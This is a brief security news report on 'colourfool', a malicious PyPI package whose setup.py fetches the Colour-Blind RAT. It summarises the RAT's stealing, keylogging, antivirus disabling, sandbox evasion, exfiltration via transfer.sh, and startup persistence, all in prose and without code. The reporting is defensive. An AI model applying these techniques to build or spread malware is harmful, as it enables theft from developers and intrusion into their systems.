A malicious PyPI package has been currently spreading a fully featured information stealer and remote access trojan called Colour-Blind RAT. The PyPI repositories have become a frequent and easy target entity of numerous attackers since anyone could publish packages without going through reviews, code testing, or user validation.
Based on reports, the RAT resides in a suspicious package called ‘colourfool’, a single file setup[.]py designed by malware developers to download a pastebin[.]com file.
Subsequently, the Python file will try to run the downloaded file without catching the target’s attention. Next, the RAT redirects all the output messages to the null device during installation. On the other hand, the file returns a hardcoded Discord URL upon failure.
The initial intrusion copies the downloaded file into the same directory, which the interpreter python[.]exe stays. It then executes checks with the copy functionality to prevent reinfection.
The payload of Colour-Blind RAT includes numerous lines of code.
The installed package for Colour-Blind RAT is a Python script larger than the first stage script and contains more than 2,000 lines of code. Moreover, the module has multiple capabilities, such as logging keystrokes, executing commands, eavesdropping on webcams, and stealing passwords, cookies, and crypto wallet information.
Researchers also noticed a module named ‘disbale_antivirus,’ which could potentially deactivate Microsoft Defender.
The malware developers also used several tactics to hide the malicious code using machine-readable variable names to ensure their targets’ devices were not operating in a sandbox or VM.
The remote access trojan uses a legitimate file hosting service, transfer[.]sh, for data exfiltration. Furthermore, the RAT could establish persistence through a Visual Basic script that develops a batch file to initiate the malware during the Windows startup process.
The malicious packages have surged recently and flooded the PyPI repository in the past several months. Researchers recently discovered a new wave of cybercriminal activities in which numerous malicious packages targeted the PyPI storage to target software developers.
Therefore, users should stay alert when running or downloading packages from the PyPI repository since malware developers heavily target the platform recently.
